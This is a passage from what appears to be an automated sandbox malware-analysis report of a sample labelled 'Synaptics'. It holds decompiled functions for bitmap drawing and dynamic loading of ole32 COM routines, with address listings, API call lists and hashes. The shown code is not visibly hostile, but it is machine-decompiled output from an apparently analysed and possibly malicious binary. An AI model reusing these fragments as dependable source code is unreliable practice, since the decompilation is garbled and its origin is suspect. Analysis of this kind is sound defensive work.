							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E004032B4(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00425F40();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E0041D8CC(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00426498(_v32);
				}
				_push(0);
				L00407638();
				_v16 = E00426060(_t160);
				_push(_t323);
				_push(0x42a97b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x49b620 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L004072E8();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E79C(_t245, _t257, _t317, _t321);
							} else {
								E00425F40();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E0041D8CC(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42a94a;
						 *[fs:eax] = _t290;
						_push(0x42a982);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407888();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040275C(_t321);
					_push(_t323);
					_push(0x42a8e3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E0041D8CC(_v12, _t321, _v24);
					_push(_v16);
					L004072E0();
					_v20 = E00426060(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L004072D8();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00426750(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00407440();
						_v56 = _t204;
						_push(_v20);
						L00407418();
					}
					_push(_t323);
					_push(0x42a8b7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push("true");
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L004072F0();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E79C(_t245, _t263, _t317, _t321);
						} else {
							E00425F40();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42a8be);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00407440();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                                                                                                                                                                                            0x0042a510
                                                                                                                                                                                                                            0x0042a511
                                                                                                                                                                                                                            0x0042a513
                                                                                                                                                                                                                            0x0042a51c
                                                                                                                                                                                                                            0x0042a51e
                                                                                                                                                                                                                            0x0042a521
                                                                                                                                                                                                                            0x0042a526
                                                                                                                                                                                                                            0x0042a52b
                                                                                                                                                                                                                            0x0042a530
                                                                                                                                                                                                                            0x0042a540
                                                                                                                                                                                                                            0x0042a547
                                                                                                                                                                                                                            0x0042a54f
                                                                                                                                                                                                                            0x0042a551
                                                                                                                                                                                                                            0x0042a551
                                                                                                                                                                                                                            0x0042a568
                                                                                                                                                                                                                            0x0042a56e
                                                                                                                                                                                                                            0x0042a573
                                                                                                                                                                                                                            0x0042a574
                                                                                                                                                                                                                            0x0042a579
                                                                                                                                                                                                                            0x0042a57c
                                                                                                                                                                                                                            0x0042a581
                                                                                                                                                                                                                            0x0042a582
                                                                                                                                                                                                                            0x0042a587
                                                                                                                                                                                                                            0x0042a58a
                                                                                                                                                                                                                            0x0042a591
                                                                                                                                                                                                                            0x0042a5f0
                                                                                                                                                                                                                            0x0042a5f3
                                                                                                                                                                                                                            0x0042a5f9
                                                                                                                                                                                                                            0x0042a5ff
                                                                                                                                                                                                                            0x0042a619
                                                                                                                                                                                                                            0x0042a620
                                                                                                                                                                                                                            0x0042a62f
                                                                                                                                                                                                                            0x0042a634
                                                                                                                                                                                                                            0x0042a642
                                                                                                                                                                                                                            0x0042a64e
                                                                                                                                                                                                                            0x0042a64e
                                                                                                                                                                                                                            0x0042a65e
                                                                                                                                                                                                                            0x0042a66e
                                                                                                                                                                                                                            0x0042a682
                                                                                                                                                                                                                            0x0042a691
                                                                                                                                                                                                                            0x0042a6a3
                                                                                                                                                                                                                            0x0042a6a9
                                                                                                                                                                                                                            0x0042a6a9
                                                                                                                                                                                                                            0x0042a593
                                                                                                                                                                                                                            0x0042a5a3
                                                                                                                                                                                                                            0x0042a5a6
                                                                                                                                                                                                                            0x0042a5b2
                                                                                                                                                                                                                            0x0042a5b7
                                                                                                                                                                                                                            0x0042a5bd
                                                                                                                                                                                                                            0x0042a5c4
                                                                                                                                                                                                                            0x0042a5cb
                                                                                                                                                                                                                            0x0042a5d3
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a5d7
                                                                                                                                                                                                                            0x0042a6ac
                                                                                                                                                                                                                            0x0042a6b2
                                                                                                                                                                                                                            0x0042a6ba
                                                                                                                                                                                                                            0x0042a6c2
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6c4
                                                                                                                                                                                                                            0x0042a6cd
                                                                                                                                                                                                                            0x0042a6cf
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6f0
                                                                                                                                                                                                                            0x0042a6f5
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6f9
                                                                                                                                                                                                                            0x0042a6e3
                                                                                                                                                                                                                            0x0042a6d7
                                                                                                                                                                                                                            0x0042a700
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a70b
                                                                                                                                                                                                                            0x0042a711
                                                                                                                                                                                                                            0x0042a71d
                                                                                                                                                                                                                            0x0042a726
                                                                                                                                                                                                                            0x0042a738
                                                                                                                                                                                                                            0x0042a73e
                                                                                                                                                                                                                            0x0042a740
                                                                                                                                                                                                                            0x0042a74c
                                                                                                                                                                                                                            0x0042a756
                                                                                                                                                                                                                            0x0042a75b
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a75e
                                                                                                                                                                                                                            0x0042a761
                                                                                                                                                                                                                            0x0042a766
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a768
                                                                                                                                                                                                                            0x0042a76e
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a773
                                                                                                                                                                                                                            0x0042a778
                                                                                                                                                                                                                            0x0042a77a
                                                                                                                                                                                                                            0x0042a784
                                                                                                                                                                                                                            0x0042a789
                                                                                                                                                                                                                            0x0042a78a
                                                                                                                                                                                                                            0x0042a78f
                                                                                                                                                                                                                            0x0042a792
                                                                                                                                                                                                                            0x0042a798
                                                                                                                                                                                                                            0x0042a79d
                                                                                                                                                                                                                            0x0042a7ab
                                                                                                                                                                                                                            0x0042a8ea
                                                                                                                                                                                                                            0x0042a8ec
                                                                                                                                                                                                                            0x0042a8f1
                                                                                                                                                                                                                            0x0042a8f2
                                                                                                                                                                                                                            0x0042a8f7
                                                                                                                                                                                                                            0x0042a8f8
                                                                                                                                                                                                                            0x0042a8fb
                                                                                                                                                                                                                            0x0042a8fc
                                                                                                                                                                                                                            0x0042a901
                                                                                                                                                                                                                            0x0042a908
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a920
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a919
                                                                                                                                                                                                                            0x0042a917
                                                                                                                                                                                                                            0x0042a927
                                                                                                                                                                                                                            0x0042a92d
                                                                                                                                                                                                                            0x0042a930
                                                                                                                                                                                                                            0x0042a93b
                                                                                                                                                                                                                            0x0042a942
                                                                                                                                                                                                                            0x0042a945
                                                                                                                                                                                                                            0x0042a964
                                                                                                                                                                                                                            0x0042a967
                                                                                                                                                                                                                            0x0042a96a
                                                                                                                                                                                                                            0x0042a96f
                                                                                                                                                                                                                            0x0042a972
                                                                                                                                                                                                                            0x0042a973
                                                                                                                                                                                                                            0x0042a975
                                                                                                                                                                                                                            0x0042a97a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b1
                                                                                                                                                                                                                            0x0042a7b3
                                                                                                                                                                                                                            0x0042a7bd
                                                                                                                                                                                                                            0x0042a7c2
                                                                                                                                                                                                                            0x0042a7c3
                                                                                                                                                                                                                            0x0042a7c8
                                                                                                                                                                                                                            0x0042a7cb
                                                                                                                                                                                                                            0x0042a7d1
                                                                                                                                                                                                                            0x0042a7d6
                                                                                                                                                                                                                            0x0042a7de
                                                                                                                                                                                                                            0x0042a7df
                                                                                                                                                                                                                            0x0042a7e9
                                                                                                                                                                                                                            0x0042a7ec
                                                                                                                                                                                                                            0x0042a7ee
                                                                                                                                                                                                                            0x0042a7f0
                                                                                                                                                                                                                            0x0042a7f3
                                                                                                                                                                                                                            0x0042a7f4
                                                                                                                                                                                                                            0x0042a803
                                                                                                                                                                                                                            0x0042a808
                                                                                                                                                                                                                            0x0042a80e
                                                                                                                                                                                                                            0x0042a813
                                                                                                                                                                                                                            0x0042a815
                                                                                                                                                                                                                            0x0042a821
                                                                                                                                                                                                                            0x0042a824
                                                                                                                                                                                                                            0x0042a829
                                                                                                                                                                                                                            0x0042a82a
                                                                                                                                                                                                                            0x0042a82d
                                                                                                                                                                                                                            0x0042a82e
                                                                                                                                                                                                                            0x0042a833
                                                                                                                                                                                                                            0x0042a839
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a83a
                                                                                                                                                                                                                            0x0042a841
                                                                                                                                                                                                                            0x0042a842
                                                                                                                                                                                                                            0x0042a847
                                                                                                                                                                                                                            0x0042a84a
                                                                                                                                                                                                                            0x0042a84d
                                                                                                                                                                                                                            0x0042a84f
                                                                                                                                                                                                                            0x0042a852
                                                                                                                                                                                                                            0x0042a856
                                                                                                                                                                                                                            0x0042a857
                                                                                                                                                                                                                            0x0042a859
                                                                                                                                                                                                                            0x0042a85a
                                                                                                                                                                                                                            0x0042a85d
                                                                                                                                                                                                                            0x0042a85e
                                                                                                                                                                                                                            0x0042a863
                                                                                                                                                                                                                            0x0042a86a
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a87c
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a875
                                                                                                                                                                                                                            0x0042a873
                                                                                                                                                                                                                            0x0042a883
                                                                                                                                                                                                                            0x0042a886
                                                                                                                                                                                                                            0x0042a889
                                                                                                                                                                                                                            0x0042a892
                                                                                                                                                                                                                            0x0042a894
                                                                                                                                                                                                                            0x0042a899
                                                                                                                                                                                                                            0x0042a89d
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a89e
                                                                                                                                                                                                                            0x0042a8b6
                                                                                                                                                                                                                            0x0042a8b6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                                                                                                                                                                                            • 73C9A7F0.GDI32(?,?,?,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                                                                                                                                                            • String ID: ($BM
                                                                                                                                                                                                                            • API String ID: 3415089252-2980357723
                                                                                                                                                                                                                            • Opcode ID: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                                                            • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00478268 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00478268(intOrPtr* __eax, void* __edx, void* __esi) {
				intOrPtr* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t12;

				 *((intOrPtr*)(__edx + __eax)) =  *((intOrPtr*)(__edx + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_t4 = __eax + __eax;
				 *_t4 =  *_t4 + _t4;
				 *_t4 =  *_t4 + _t4;
				 *_t4 =  *_t4 + _t4;
				_t5 = GetModuleHandleA("ole32.dll");
				_t12 = _t5;
				if(_t12 != 0) {
					 *0x49c9cc = GetProcAddress(_t12, "CoCreateInstanceEx");
					 *0x49c9d0 = GetProcAddress(_t12, "CoInitializeEx");
					 *0x49c9d4 = GetProcAddress(_t12, "CoAddRefServerProcess");
					 *0x49c9d8 = GetProcAddress(_t12, "CoReleaseServerProcess");
					 *0x49c9dc = GetProcAddress(_t12, "CoResumeClassObjects");
					_t5 = GetProcAddress(_t12, "CoSuspendClassObjects");
					 *0x49c9e0 = _t5;
				}
				return _t5;
			}






                                                                                                                                                                                                                            0x00478268
                                                                                                                                                                                                                            0x0047826b
                                                                                                                                                                                                                            0x0047826d
                                                                                                                                                                                                                            0x0047826f
                                                                                                                                                                                                                            0x00478271
                                                                                                                                                                                                                            0x00478273
                                                                                                                                                                                                                            0x00478275
                                                                                                                                                                                                                            0x0047827e
                                                                                                                                                                                                                            0x00478283
                                                                                                                                                                                                                            0x00478287
                                                                                                                                                                                                                            0x00478294
                                                                                                                                                                                                                            0x004782a4
                                                                                                                                                                                                                            0x004782b4
                                                                                                                                                                                                                            0x004782c4
                                                                                                                                                                                                                            0x004782d4
                                                                                                                                                                                                                            0x004782df
                                                                                                                                                                                                                            0x004782e4
                                                                                                                                                                                                                            0x004782e4
                                                                                                                                                                                                                            0x004782ea

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 0047827E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 0047828F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0047829F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 004782AF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 004782BF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 004782CF
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 004782DF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                                                                                                                            • Opcode ID: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                                                            • Instruction ID: 1319bd0047e82110eb300eecde3395248effe05b75cadb67779d88dc7b717903
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba8e2c4f0dfdd8fef15a513eba99df2a8458c6260de3b235262294da52c1260
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16F044F09CE3C02ED30167790CA6A632F689912B0431491BFB808EA5D3C97D4804976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426070 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L004072E0();
				_v28 = __eax;
				_push(0);
				L004072E0();
				_v32 = __eax;
				_push(_t87);
				_push(0x4261be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00407638();
					_v24 = _t37;
					if(_v24 == 0) {
						E00425FB8(__ecx);
					}
					_push(_t87);
					_push(0x42612d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L004072D8();
					_v20 = _t41;
					if(_v20 == 0) {
						E00425FB8(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x426134);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407888();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L004072C8();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x4261c5);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}
























                                                                                                                                                                                                                            0x00426071
                                                                                                                                                                                                                            0x00426073
                                                                                                                                                                                                                            0x0042607e
                                                                                                                                                                                                                            0x0042607f
                                                                                                                                                                                                                            0x00426080
                                                                                                                                                                                                                            0x00426082
                                                                                                                                                                                                                            0x00426085
                                                                                                                                                                                                                            0x00426087
                                                                                                                                                                                                                            0x0042608c
                                                                                                                                                                                                                            0x0042608f
                                                                                                                                                                                                                            0x00426091
                                                                                                                                                                                                                            0x00426096
                                                                                                                                                                                                                            0x0042609b
                                                                                                                                                                                                                            0x0042609c
                                                                                                                                                                                                                            0x004260a1
                                                                                                                                                                                                                            0x004260a4
                                                                                                                                                                                                                            0x004260b1
                                                                                                                                                                                                                            0x004260b8
                                                                                                                                                                                                                            0x004260d2
                                                                                                                                                                                                                            0x004260d4
                                                                                                                                                                                                                            0x004260d9
                                                                                                                                                                                                                            0x004260e0
                                                                                                                                                                                                                            0x004260e2
                                                                                                                                                                                                                            0x004260e2
                                                                                                                                                                                                                            0x004260e9
                                                                                                                                                                                                                            0x004260ea
                                                                                                                                                                                                                            0x004260ef
                                                                                                                                                                                                                            0x004260f2
                                                                                                                                                                                                                            0x004260f8
                                                                                                                                                                                                                            0x004260fc
                                                                                                                                                                                                                            0x004260fd
                                                                                                                                                                                                                            0x00426100
                                                                                                                                                                                                                            0x00426101
                                                                                                                                                                                                                            0x00426106
                                                                                                                                                                                                                            0x0042610d
                                                                                                                                                                                                                            0x0042610f
                                                                                                                                                                                                                            0x0042610f
                                                                                                                                                                                                                            0x00426116
                                                                                                                                                                                                                            0x00426119
                                                                                                                                                                                                                            0x0042611c
                                                                                                                                                                                                                            0x00426121
                                                                                                                                                                                                                            0x00426124
                                                                                                                                                                                                                            0x00426125
                                                                                                                                                                                                                            0x00426127
                                                                                                                                                                                                                            0x0042612c
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260ba
                                                                                                                                                                                                                            0x004260bc
                                                                                                                                                                                                                            0x004260be
                                                                                                                                                                                                                            0x004260c3
                                                                                                                                                                                                                            0x004260c4
                                                                                                                                                                                                                            0x004260c7
                                                                                                                                                                                                                            0x004260c8
                                                                                                                                                                                                                            0x004260cd
                                                                                                                                                                                                                            0x00426138
                                                                                                                                                                                                                            0x00426147
                                                                                                                                                                                                                            0x00426156
                                                                                                                                                                                                                            0x0042617d
                                                                                                                                                                                                                            0x00426184
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x0042618b
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426199
                                                                                                                                                                                                                            0x00426192
                                                                                                                                                                                                                            0x004261a0
                                                                                                                                                                                                                            0x004261a3
                                                                                                                                                                                                                            0x004261a6
                                                                                                                                                                                                                            0x004261af
                                                                                                                                                                                                                            0x004261bd
                                                                                                                                                                                                                            0x004261bd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426087
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000), ref: 00426091
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,?,00000018,?,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00426142
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426151
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426199
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261AF
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261B8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 956127455-0
                                                                                                                                                                                                                            • Opcode ID: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                                                            • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b939bd58d8576efde727da06b39e28273c11fb0ae0a4339bc6659599a28bf24a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004424F8 Relevance: 19.7, APIs: 13, Instructions: 224COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 55%
